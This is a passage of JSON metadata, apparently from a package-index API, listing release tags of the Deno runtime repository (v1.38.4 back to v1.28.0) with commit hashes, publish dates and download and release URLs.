"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F